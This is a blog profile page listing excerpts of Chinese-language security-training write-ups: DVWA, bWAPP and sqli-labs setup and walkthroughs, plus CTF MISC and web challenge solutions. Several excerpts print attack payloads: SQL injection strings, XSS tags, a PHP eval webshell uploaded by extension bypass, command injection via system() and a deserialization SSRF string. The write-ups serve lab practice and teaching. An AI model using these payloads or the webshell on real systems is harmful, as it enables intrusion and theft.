自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(52)
  • 收藏
  • 关注

原创 Mysql基本使用(增,删,查改,写入shell等)

1.增添:INSERT INTO [表名] VALUES(’’,’’,…顺序排列的数据);注:如上语句,表结构中有自动增长的列,也必须为其指定一个值,通常为0insert into 表名(id,name)values(0,‘尹当’)–同上2.查询: SELECT * FROM [表名] WHERE ([条件]);查询所有的数据:select *from 表名;带条件的查询:select from 表名 where 列名=条件值;Select from 表名 where 列名 not l

2020-11-28 12:29:46 2210 2

原创 DVWA通关教程

Brute Force(暴力(破解))Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。low:先审计代码<?phpif( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass =

2020-11-24 21:35:21 8067 3

原创 DVWA完整搭建教程

一. 简介DVWA(Damn Vulnerable Web Application)是一个很容易受到攻击的PHP / MySQL Web应用程序,其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,帮助Web开发人员更好地了解保护Web应用程序的过程。二. 搭建前准备phpstudy下载官网:https://www.xp.cn/下载完成后打开Apache+MySQL功能点击网站,再单击左上角的创建网站根目录改到DVWA下,点击确定,网站即可创建成功。2.DVWA下载官网:

2020-11-23 17:09:56 9297 2

原创 bwapp通关教程

**HTML Injection - Reflected (GET)**low:低级漏洞中,输入数据没有做校验First name: <script>alert( 'xss' )</script>Last name: <script>alert( 'xss' )</script>出现xss即为成功。medium和low一样,但发现被全部显示抓包,会发现符号<>均被编码0,1,2分别对应三个等级找见对应的/bWAPP/bw

2020-11-01 21:57:09 6463 2

原创 Bwapp平台的介绍与搭建方法

先来介绍一下bwappbwapp是一款非常好用的漏洞演示平台,包含有100多个漏洞 SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP,PHP Code, Host Header and SMTP injectionsAuthentication, authorization and session management issuesMalicious, unrestricted file uploads and backdoor files

2020-10-30 23:38:25 3980 4

原创 sqli-labs: Less 21-65 通关教程

第二十一关:cookie注入YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26注: RHVtYg== 是 Dumb 经Base64加密后的值和上关又是差不多 base64编码而已payload:') or 1=1 #Jykgb3IgMT0xICM=第二十二关:闭合为双引号 参考21关.第二十三关:过滤了注释符号 而已$reg = "/#/";$reg1 = "/--/";$repla

2020-10-27 16:48:53 417 1

原创 sqli-labs:Less 11~20 通关详解

第十一关:看到登录框,先使用弱口令进行尝试,登录成功输入单引号尝试引起报错猜测后台语句为:select * from where username=‘username’ and password=’$password’接下来使用布尔注入,这里使用or 1=1永真句可以将所有查找结果输出判断列数成功查找到信息第十二关输入单引号没有引起报错,尝试输入双引号,报错信息很多,直接看到了后台的语句这里根据报错信息,使用双引号加括号闭合第十三关通过报错信息可以构造如下的闭合方式这一关同

2020-10-27 15:32:40 586

原创 sqli-labs注入环境搭建详细教程

Sqli-libs是一个非常好的SQL注入学习实战平台,涵盖了报错注入、盲注、Update注入、Insert注入、Heather注入、二阶注入、绕过WAF,比较全面的一个注入平台。本次在phpstudy环境上部署sqli-labs 注入平台。工具/原料sqli-labs https://github.com/audi-1/sqli-labsphpstudy https://jingyan.baidu.com/article/a3f121e4879a86fc9052bb05.html步骤:第一步:

2020-10-27 12:49:54 1464 2

转载 sqli-labs-master 闯关前知识点学习

1)、前期准备、知识点开始之前,为了方便查看sql注入语句,我在sqli-labs-master网页源码php部分加了两行代码,第一行意思是输出数据库语句,第二行是换行符一、Mysql 登录1、明文密码 在bin目录下 输入:mysql -u 账户 -p 密码2、**密码 在bin目录下 输入:mysql -u 账户 -p 后回车再输入密码二、注释符–+ – # 都是SQL语句的注释符 ,sql语句运行到此结束。三、and orA and B A,B都Ture 结果才为Ture

2020-10-27 12:15:46 224

原创 sqli-lbs:Less-5~10通关详解

1.输入?id=2看见页面如下: 输入?id=666时,发现页面发生变化说明页面没有显示位。无法使用联合查询注入2.接着我们尝试在URL中输入 ?id=2’ 页面出现错误语句如下但是可以发现存在注入点,这里可以闭合引号,随后通过查询列数发现这里也是3列这道题使用的是报错注入2.何为报错注入:报错注入就是通过人为的引起数据库的报错,但是数据库在报错的同时会将查询的结果也呈现在报错中,我在这里介绍一下报错注入以及原理这是网上使用最广泛的一句报错注入语句:select count(*),(fl

2020-10-22 18:54:04 538

原创 sqli-lbs-2 GET - Error based - Intiger based (基于错误的GET整型注入)

知识点:1,判断是数字型还是字符型,单引号还是双引号2,union select联合查询注入3,payload原理与防御措施这道题与上道题的主要区别就是这个是整型,即这个题的id参数没有引号,只是数字,这意味着在你绕过的时候可以不需要对后面的引号过滤(如果没有其他干扰的话)大概步骤:1.输入?id=2-1页面信息发生变化,说明此处是数值型注入2.order by 3 页面显示正常,order by 4页面显示不正常,所以该表有3列数据3.接着可以使用联合查询进行注入,详细过程参考第一关接下来

2020-10-18 13:52:37 212

原创 sqli-labs 1~4关详解

点进去题目:提示我们输入题目id,第一题,所以我们输入?id=1,回车即可。如图:首先可以判断这里接受的是一个GET请求,先在1后面加一个’ 发现报错,说明这里没有过滤掉引号,所以这里是一个注入点SQL注入通常有两种类型,整形注入和字符型注入,那么我们要判断这是哪种注入就要分析这里的报错语句,报错信息中共有5个单引号,"实际上是两个单引号,最外面的两个是报错信息的提示引号,'1’两边的引号是后台代码的引号,多出来的就是我们加上的,因为这里给输入的1加上了引号所以后台接受的是字符型,那么我们在后续的注入中需

2020-10-15 21:04:59 502

原创 攻防世界MISC进阶区之What-is-this

下载所给附件,我们直接给文件增添后缀.zip,得到一个新的压缩包,打开后得到两张新的图片我们用Stegsolve将两张图片合并,即可得到答案答案:AZADI TOWER

2020-08-19 15:26:16 199

原创 攻防世界MISC进阶区之Hear-with-your-Eyes

下载所给附件,用winhex打开,发现是个wav文件,果然修改文件扩展名为.rar会发现有一个音频文件,我们用audacity打开,选择左上方的sound选项,找到其中的频谱图,就会得出答案直接输入flag后边的内容就完成了。...

2020-08-19 15:15:43 906

原创 攻防世界MISC进阶区之reverseMe

打开所给附件,是一张jpg图片我们发现他就是镜像的flag,我们用Photoshop将其打开,图像→图像旋转→水平翻转画布,即可得到flagflag{4f7548f93c7bef1dc6a0542cf04e796e}

2020-08-19 14:50:57 1959

原创 攻防世界MISC进阶区之Banmabanma

打开所给附件,看见是个斑马,但我们可以看出来它的身体是一个条形码我们直接利用条形码在线阅读得到其内容:https://online-barcode-reader.inliteresearch.com/结合所给格式,答案为flag{TENSHINE}

2020-08-19 14:40:58 5838

原创 攻防世界MISC进阶区之Test-flag-please-ignore

下载所给附件,可以用记事本打开我们看到一串16进制字符,我们通过在线转换即可得到flag。转换网站:https://www.bejson.com/convert/ox2str/flag{hello_world}

2020-08-19 14:34:56 343

原创 攻防世界MISC进阶区之János-the-Ripper

下载所给附件,先用winhex打开我们会发现有flag.txt,所以我们给文件增添后缀名.zip发现flag.txt还需要密码,所以我们用ARCHPR暴力破解压缩包密码得到密码fish即可得到flag{ev3n::y0u::bru7us?!}

2020-08-17 19:36:56 252

原创 攻防世界MSIC进阶区之can_has_stdio?

下载所给附件,我们可直接用记事本打开,打开后会看见它是由±<>这样符号组成的五角星,再结合题目stdio,估计是c语言编译后的文件,我们可以直接用Brainfuck在线解码,点击Brainfuck to Text即可得到flagflag{esolangs_for_fun_and_profit}...

2020-08-17 19:22:19 433

原创 攻防世界MISC进阶区之Training-Stegano-1

下载所给附件打开后是一个bmp文件,我们用winhex打开就可直接看到答案:stegancI

2020-08-17 19:14:19 328

原创 攻防世界MISC进阶区之a_good_idea

下载所给附件,将文件后缀改为zip得到一个压缩文件,里边有一个文档和两张图片我们用stegslove将这两张图片合并,我们会找到一个散布红点的图片,我们保存下来用Photoshop打开,将它的曝光度调到最高,我们就会得到一个二维码用qrresearch扫描二维码即可得到答案NCTF{m1sc_1s_very_funny!!!}...

2020-08-17 19:06:48 377

原创 攻防世界MISC进阶区之Aesop_secret

下载附件发现是一张动态照片,用Photoshop打开,将9个图层全叠加到一起发现是ISCC,像是一个密钥,将该图片放到winhex中打开,翻到最后边会发现一串加密后的字符我们用ASE在线解密,网址https://www.sojson.com/encrypt_aes.html初次解密:我们进行二次解密:即可得到flag{DugUpADiamondADeepDarkMine}...

2020-08-17 18:40:41 419

原创 攻防世界MISC进阶区之embarrass

先下载所给附件,下载完成后有个能用wireshark打开的文件打开后我们在分组字节流里直接搜索字符串flag{就可搜到flagflag{Good_b0y_W3ll_Done}

2020-08-14 11:40:55 334

原创 攻防世界MISC进阶区之 pure_color

下载所给附件并打开,发现是一张空白png图片用Stegsolve打开单击Analyse Format→File Format![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111617977.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1NzU2OTcx,size_16,color_F

2020-08-14 11:21:38 240

原创 攻防世界MISC进阶区之wireshark-1

下载所给附件,用wireshark打开过滤器筛选为HTTP,并搜索POST找到追踪TCP流,在返回结果中就可以看到flagflag{ffb7567a1d4f4abdffdb54e022f8facd}

2020-08-13 12:05:49 502

原创 攻防世界MISC进阶区之Modbus

下载所给附件,发现可以用wireshark打开,打开后用Modbus过滤器搜索flag发现后右击-追溯流-tcp流,即可找到一些类似flag的东东根据它我们再补完整Modbus即可得到完整的flag:sctf{Easy_Modbus}

2020-08-13 11:42:13 537

原创 攻防世界MISC进阶区之base64÷4

下载附件打开根据题目可知该题是base16解码,我们可以利用在线解码工具解码得到flag{E33B7FD8A3B841CA9699EDDBA24B60AA}

2020-08-13 10:16:31 215

原创 攻防世界web进阶区之ics-04

题目:进去点击右上角的注册界面先注册一个账号发现登陆不成功我们可以从那个忘记密码处寻找突破口,经过测试,发现这个页面存在SQL注入漏洞,在用户名框内输入 1’OR(1)OR’ ,页面发生了变化,成功绕过用户名检查。找数据库名:-1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata #数据名为cetc004,表名:-1’ union select 1,2,group_concat(table_nam

2020-08-08 18:29:37 330

原创 攻防世界web进阶区之ics-07

题目:点开链接,根据题目打开项目管理页面:点击view-source查看并分析页面源码第一段<?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php');

2020-08-08 16:30:13 234

原创 攻防世界we进阶区之upload1

题目:打开链接,先上传一个php文件试试所以,我们新建一个1.txt,写入php一句话: <?php @eval($_REQUEST[‘c’]);?>然后修改文件后缀为.png上传该文件并抓包,修改filename后缀为.php得到upload:upload/1596870603.1.php,打开成功利用中国蚁剑链接,密码即为刚刚所创的png格式的php文件里的c连接成功,打开html文件下的flag.php即可得到flag$flag=“cyberpeace{e54061244aa29c17

2020-08-08 15:17:13 268

原创 攻防世界web进阶区之unfinish

题目:进入所给链接,发现是一个登陆界面我们进入注册界面题目为二次注入,参照大佬给出的代码,修改注册url和登录url即可跑出flagimport requestsimport timefrom bs4 import BeautifulSoup #html解析器def getDatabase(): database = '' for i in range(10): data_database = { 'username':"0'+

2020-08-08 12:57:29 485

原创 攻防世界web进阶区之bug

题目如图所示:打开题目所给链接,会发现一个登陆界面我们先注册然后登陆,成功点击manage会发现弹出对话框我们返回登录界面还发现一个fiadwd找回密码界面,输入信息,修改密码是用burp抓包抓包修改账户密码重置管理员密码成功。登录账号。再点击manage又弹出一个对话框所以我们在抓的包中添加一个 X-Forwarded-For: 127.0.0.1,发现传参:index.php?module=filemanage&do=???,我们根据题目猜测是upload,传参试试先传参成功,我们选择一个p

2020-08-05 12:10:19 454

原创 攻防世界web进阶区之ics-05

打开题目所给链接一个接一个点,发下只有设备维护中心可以点开单机云平台设备中心会发现URL栏有参数?page=index,本题可能存在文件漏洞,采用php协议,用?page=php://filter/read=convert.base64-encode/resource=index.php查看页面源代码解码后分析原码,可以利用在线解码工具解码,分析代码伪造XFF头来登入系统,payload:/index.php?pat=/123/e&rep=system(“find±iname+flag”)&

2020-07-31 13:13:23 237

原创 攻防世界web进阶区之web2

点开题目所给链接得到一堆代码题目已经把解法给我们说的很明确了,直接上代码即可得到flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

2020-07-31 10:20:11 233

原创 攻防世界web进阶区之unserialize3

打开题目所给链接得到一堆代码我们要绕过__wakeup这个魔术函数,不然就会被exit掉,我们这里实例化xctf类并对其使用序列化我们将上述的序列化的字符串中的对象属性个数由真实值1修改为2,即O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;},即可得到flag。 cyberpeace{5ddefc2853168af40bc99f8182951fa5}...

2020-07-30 16:26:56 219

原创 攻防世界web进阶区之Web_php_include

代码审计后我们会发现存在文件包含漏洞。借助hello参数构建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>然后借助参数?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flagctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}...

2020-07-30 12:17:46 372

原创 攻防世界web进阶区之Web_php_unserialize

打开题目链接会得到一堆代码通过 //the secret is in the fl4g.php 这句话我们可以看出来我们所需要的flag在fl4g.php中,我们需要通过反序列化才能得到fl4g.php里边的内容,借鉴下别人的代码通过在线运行工具我们就可以解出所需参数TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==传参 ?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZml

2020-07-30 11:22:47 435

原创 攻防世界web进阶区之mfw

打开题目所给链接:首先查看源码,会发现这个但访问之后没什么用。我们点开About会发现它似乎存在git源码泄露,访问/.git/抓包后发现flag.php但对解题没什么作用,我们查看index.php看是否能找到猫腻我们利用assert命令执行来查看flag的内容 payload:?page=1’,‘2’) === false and system(‘cat templates/flag.php’) and strpos('templates/flag ,查看源码即可得到flagcyberpeace{

2020-07-25 12:23:44 199

原创 攻防世界web进阶区之CAT

打开题目所给链接:首先我们先试用最具有代表性之一的baidu.com进行检测,但发现无响应来试试127.0.0.1尝试使用管道进行命令执行,输入127.0.0.1 | ls,然而得到的回显是Invalid URL,127.0.0.1 | phpinfo的执行结果也是Invalid URL,看来命令执行时行不通了。payload:?url=@/opt/api/api/settings.py,获取数据库名观察代码发现?/opt/api/database.sqlite3 @会当成绝对路径来读取文件,刚好@字符

2020-07-24 21:19:21 204

原创 攻防世界web进阶区之fakebook

首先,打开题目链接:点击join创造一个新用户,创建完成后如图所示: 我们会发现这个blank可以点开,这里存在一个get注入我们会发现/var/www/html/view.php 路径,利用no参数进行注入,在反序列化中构造file文件协议,利用服务端请求伪造漏洞访问服务器上的flag.php文件。Payload:?no=0//union//select 1,2,3,'O:8:“UserInfo”:3:{s:4:“name”;s:1:“1”;s:3:“age”;i:1;s:4:“blog”;s:29:“

2020-07-24 20:24:34 215

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除